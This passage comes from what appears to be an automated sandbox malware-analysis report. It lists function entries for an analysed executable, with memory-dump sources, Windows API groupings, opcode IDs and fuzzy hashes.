                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1352109105-0
                                                                                                                                                                                                                    • Opcode ID: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                                                                                                                                                                    • Instruction ID: 0fc1ac59d643b06b5d1ef10307f0bb022e286c539e01323da22678fb7254bcc6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97419372A08A4685EB50CF19D88467977A0FB94B98F194B35CE5DE7BA0DF3EE441CB00
                                                                                                                                                                                                                    Function 00007FF656D5AA04 Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3076010158-0
                                                                                                                                                                                                                    • Opcode ID: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                                                                                                                                                                                    • Instruction ID: 26eb79a8998b7e79a9c58ccc2e3d63dad12006b9d3e4161b2629770d26fa461e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA419E36B04B568AEB50CF66D4402AD37B1FB54B98F184636CE0DA7B54CF3AE895C780
                                                                                                                                                                                                                    Function 00007FF656CEC72C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4141327611-0
                                                                                                                                                                                                                    • Opcode ID: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                                                                                                                                                                    • Instruction ID: b5e6bff0ff9253ead3317064f80a5f2701a0d0b6b13356a6196d4bf61625b807
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8241B3B2A0C78386FB629B51D14637966B0EF81B90F2C8131DA6DA6AD5DF3EDC41C701
                                                                                                                                                                                                                    Function 00007FF656D28B38 Relevance: 6.1, APIs: 4, Instructions: 96keyboardwindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                                                                                    • Opcode ID: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                                                                                                                                                                    • Instruction ID: dc945f75c6a13c1623f88268bcec5f93ce2823899d365f15b5fde5a03e5a18d6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A54116A2A0D69281F7B08F2198106B967A0FB44F90F5C0B31EA9A736D5CF3ED499D740
                                                                                                                                                                                                                    Function 00007FF656D5C580 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LongWindow$InvalidateMessageRectSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3340791633-0
                                                                                                                                                                                                                    • Opcode ID: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                                                                                                                                                                    • Instruction ID: 5d32e49a4026d1dcdab8df8adbc380ab2194beb7e900c4a5d301e4041697f89d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4041B231E0A64A85FB649B14C4003B86360EB95B95F1C6B36D60DA3BF1CE3EEA81C740
                                                                                                                                                                                                                    Function 00007FF656D28CAC Relevance: 6.1, APIs: 4, Instructions: 89keyboardwindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 432972143-0
                                                                                                                                                                                                                    • Opcode ID: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                                                                                                                                                                    • Instruction ID: 4cfc6211cbc88d3a8ab99cb2f42816ddaaad19cf7767be35f23e028ac0a6d933
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C31B821A0C68149F7B08B25D80077927A0FB94B94F5D0B36DA9963795CE3ED599C740
                                                                                                                                                                                                                    Function 00007FF656D3D7DC Relevance: 6.1, APIs: 4, Instructions: 82networkCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1463438336-0
                                                                                                                                                                                                                    • Opcode ID: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                                                                                                                                                                    • Instruction ID: 2fcb79619177a1a84a15ce23edf29b1e06cf2edc222d7f37c404c3472be4c249
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A317C32B0974282EB24DB16E4507796361FB89BD4F085B36DA4DA7B88DF3EE454CB40
                                                                                                                                                                                                                    Function 00007FF656CF3D98 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF656CEA27B,?,?,?,00007FF656CEA236), ref: 00007FF656CF3DB1
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF656CEA27B,?,?,?,00007FF656CEA236), ref: 00007FF656CF3E13
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF656CEA27B,?,?,?,00007FF656CEA236), ref: 00007FF656CF3E4D
                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF656CEA27B,?,?,?,00007FF656CEA236), ref: 00007FF656CF3E77
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1557788787-0
                                                                                                                                                                                                                    • Opcode ID: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                                                                                                                                                                    • Instruction ID: 40e1cc27cb5f3b1a686d11019ecb96a30e96a5e1f8fa4b1162b7b8daf61a1d61
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01582a1cc1afdad6e1d5985337141992fa687edcd13d7850452916e3cfeba0bf
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F216F61F18B9281E6209F16A440029B6B5FF98FD0B4C4234DE9EB3B94DF3DE852C780
                                                                                                                                                                                                                    Function 00007FF656D5F8A8 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Long
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 847901565-0
                                                                                                                                                                                                                    • Opcode ID: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                                                                                                                                                                    • Instruction ID: dcb6892e6cacf14035e66f655fd316afe94bf1591272b8fa7c35de9ea2daa442
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E21AE61A08B4185EA208F259884339B790EF95BE4F1D4B35DA6DABBE4CF3DE441CB00
                                                                                                                                                                                                                    Function 00007FF656D6108C Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2864067406-0
                                                                                                                                                                                                                    • Opcode ID: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                                                                                                                                                                    • Instruction ID: 7ae59e315cdfcd2459a23a12a8bee9b28a4f05ee360d6503b4027f1a0f90e31a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27317036A08A4585EB20CB1AE8943B9B360FB98FD4F584731DA4D93BA4CF3ED485C700
                                                                                                                                                                                                                    Function 00007FF656D250E4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                    • String ID: cdecl
                                                                                                                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                    • Opcode ID: ab43f0fabf005240187241d52f848124de59791977a604c388b9ee2eb90bea45
                                                                                                                                                                                                                    • Instruction ID: 2569b31c4252e410bc78dc75baf95beeebebdf29633011ab3d02b9d5f5b5a87d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab43f0fabf005240187241d52f848124de59791977a604c388b9ee2eb90bea45
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8219F2160478286EA24AF16E85427873A1EF98FD0B4C8734EB5E973A0DF3EE490C304
                                                                                                                                                                                                                    Function 00007FF656D1D6A0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 837644225-0
                                                                                                                                                                                                                    • Opcode ID: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                                                                                                                                                                    • Instruction ID: 73d592fa971ced1a4ab39e39f82bb61cdabb411863013af905752c43199e485c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32219C72A18A5186EB14CF21E404768B3A5FB48B95F594B3ACA1E93744DF7EE941C700
                                                                                                                                                                                                                    Function 00007FF656CB932C Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3970641297-0
                                                                                                                                                                                                                    • Opcode ID: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                                                                                                                                                                    • Instruction ID: 0517b39dae6a5ce749e118f22ae1737d50dc40693d466d7810c6ec24ac5f88f0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC21717260C7C58AE7648B15E4447AAB7A0FB89784F580235DA8D97B54CF3DD484CB00
                                                                                                                                                                                                                    Function 00007FF656D62264 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB2A54: GetWindowLongPtrW.USER32 ref: 00007FF656CB2A71
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?,?,?,?,00007FF656CFAA36,?,?,?,?,?,?,?,?,?,00007FF656CB27AF), ref: 00007FF656D622C4
                                                                                                                                                                                                                    • GetCursorPos.USER32(?,?,?,?,?,00007FF656CFAA36,?,?,?,?,?,?,?,?,?,00007FF656CB27AF), ref: 00007FF656D622CF
                                                                                                                                                                                                                    • ScreenToClient.USER32 ref: 00007FF656D622DD
                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?,00007FF656CFAA36,?,?,?,?,?,?,?,?,?,00007FF656CB27AF), ref: 00007FF656D6231F
                                                                                                                                                                                                                      • Part of subcall function 00007FF656D5E894: LoadCursorW.USER32 ref: 00007FF656D5E945
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClientCursor$LoadLongProcRectScreenWindow
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1626762757-0
                                                                                                                                                                                                                    • Opcode ID: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                                                                                                                                                                    • Instruction ID: 6835bbdccbb93ab4bba00751d6c8a79998ec27d7558f6556e8b63586ca64a572
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c10d22a9dfdb007e9cd3e446db2f26fc59a904d9b079c484f8598dfd72a81c9f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95215032A08642C6EA24DB05F4805697770FB98F84F580B35DB4D97B59CF3DE945CB00
                                                                                                                                                                                                                    Function 00007FF656CE2FB8 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
